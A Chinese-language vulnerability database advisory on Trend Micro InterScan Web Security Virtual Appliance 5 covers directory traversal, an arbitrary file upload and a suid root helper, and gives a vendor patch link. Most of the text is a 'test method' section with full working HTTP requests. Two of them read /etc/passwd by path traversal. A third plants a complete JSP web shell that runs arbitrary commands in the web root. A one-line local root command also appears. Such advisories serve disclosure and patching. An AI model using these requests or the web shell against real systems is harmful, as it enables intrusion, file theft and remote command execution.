ZeroBox Vulnerability Database

受影响系统：

Trend Micro InterScan Web Security Virtual Appliance 5

描述：

---

BUGTRAQ  ID: 41072

InterScan Web Security Virtual Appliance是一款能安装在VMware平台上的网页过滤产品。

InterScan Web Security Virtual Appliance没有正确地过滤提交给/servlet/com.trend.iwss.gui.servlet.exportreport的exportname"参数和提交给/servlet/com.trend.iwss.gui.servlet.ConfigBackup的pkg_name参数，远程攻击者可以通过目录遍历攻击从系统下载任意文件。

InterScan Web Security Virtual Appliance的com.trend.iwss.gui.servlet.XMLRPCcert servlet没有正确地执行安全检查，允许用户上传带有任意扩展名的文件。如果上传了包含有Web Shell的特制JSP脚本，就会导致执行任意命令；此外用户还可以通过目录遍历技术更改原始目的地路径。

InterScan Web Security Virtual Appliance中的uihelper shell设置了suid位，本地用户通过$/usr/iwss/AdminUi/uihelper whoami就可以以root权限执行命令。

<*来源：Ivan Huertas
  
  链接：http://secunia.com/advisories/40328/
        http://marc.info/?l=full-disclosure&m=127730641328283&q=p5
        http://marc.info/?l=full-disclosure&m=127730618427877&q=p5
        http://marc.info/?l=full-disclosure&m=127730628828036&q=p5
        http://www.trendmicro.com/ftp/documentation/readme/iwsva_50_ar64_en_cp1386_readme.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1

Host: xxx.xxx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp

Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370

Content-Type: application/x-www-form-urlencoded

Content-Length: 99

op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1

Host: xx.xx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://xx.xx.xx.xx:1812/config_backup_result.jsp?op=export

Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370

Content-Type: application/x-www-form-urlencoded

Content-Length: 46

op=2&ImEx_success=1&pkg_name=/etc/passwd%0D%0A

    

POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1

Host: xx.xx.xx.xx:1812

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive

Referer: http://xx.xx.xx.xx:1812

Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80

Content-Type: multipart/form-data; boundary=—————————80377104394420410598722900

Content-Length: 2912

—————————–80377104394420410598722900

Content-Disposition: form-data; name="op"

save

—————————–80377104394420410598722900

Content-Disposition: form-data; name="defaultca"

yes

—————————–80377104394420410598722900

Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>

<%%>

<HTML><BODY>

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

        out.println("Command: " + request.getParameter("cmd") + "<BR>");

        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

        OutputStream os = p.getOutputStream();

        InputStream in = p.getInputStream();

        DataInputStream dis = new DataInputStream(in);

        String disr = dis.readLine();

        while ( disr != null ) {

                out.println(disr);

                disr = dis.readLine();

                }

        }

%>

</pre>

</BODY></HTML>

—————————–80377104394420410598722900

Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

<%@ page import="java.util.*,java.io.*"%>

<%%>

<HTML><BODY>

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

        out.println("Command: " + request.getParameter("cmd") + "<BR>");

        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

        OutputStream os = p.getOutputStream();

        InputStream in = p.getInputStream();

        DataInputStream dis = new DataInputStream(in);

        String disr = dis.readLine();

        while ( disr != null ) {

                out.println(disr);

                disr = dis.readLine();

                }

        }

%>

</pre>

</BODY></HTML>

—————————–80377104394420410598722900

Content-Disposition: form-data; name="importca_passphrase"

test

—————————–80377104394420410598722900

Content-Disposition: form-data; name="importca_2passphrase"

test

—————————–80377104394420410598722900

Content-Disposition: form-data; name="beErrMsg"

imperr

—————————–80377104394420410598722900–

建议：

---

厂商补丁：

Trend Micro
———–
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249&regs=NABU&lang_loc=1